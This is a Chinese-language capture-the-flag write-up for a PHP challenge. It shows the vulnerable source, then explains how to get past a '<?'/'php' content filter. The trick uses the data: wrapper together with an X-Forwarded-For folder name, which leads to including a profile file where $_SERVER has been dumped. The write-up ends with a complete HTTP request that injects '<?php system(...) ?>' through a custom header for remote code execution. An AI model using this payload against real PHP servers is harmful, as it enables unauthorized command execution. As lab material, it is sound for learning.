<?php
stream_wrapper_unregister('php');
if(isset($_GET['hl'])) highlight_file(__FILE__);
$mkdir = function($dir) {
system('mkdir -- '.escapeshellarg($dir));
};
$randFolder = bin2hex(random_bytes(16));
$mkdir('users/'.$randFolder);
chdir('users/'.$randFolder);
$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));
$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');
$_GET['page']=str_replace('.','',$_GET['page']);
if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
include($_GET['page']);
}
chdir(__DIR__);
system('rm -rf users/'.$randFolder);
?>
前面的都不紧要
关键是这两部分
$_GET['page']=str_replace('.','',$_GET['page']);
if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
include($_GET['page']);
}
绕过<? 和php字段然后文件包含。
$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));
$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
输入有X_FORWARDED_FOR
头,则会把它作为路径创建文件夹
file_put_contents('profile',print_r($_SERVER,true));
则会把一些环境变量和请求头的一些相关信息输入刚刚创建的文件夹下的profile文件下,这时如果include('profile')
则会把这些信息显示出来,并且可以解析php语句, 这样就可以rce了。
这是本地的测试:
<?php
highlight_file(__FILE__);
chdir('./');
file_put_contents('profile.txt',print_r($_SERVER,true));
include("./profile.txt");
回到题目
当allow_url_include=Off时
file_get_contents在处理data:xxx时会直接取xxx
而include会包含文件名为data:xxx的文件
file_get_contents('data:,xx/profile'); --> string 'xx/profile'
include('data:,xx/profile'); --> 'data:,xx/profile'
综上,得出payload :
GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag: <?php system('/get_flag'); ?>
GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx #创建名字为data:,xx的文件夹
实际上file_get_contents('xx/profile') 不存在xx文件夹,结果为false绕过if判断
然后include(data:,xx/profile),里面是$_SERVER的内容,其中包含下面语句执行的结果
Get-Flag: <?php system('/get_flag'); ?> #可以输入命令ls / cat等等
Get-Flag可以改成其他名字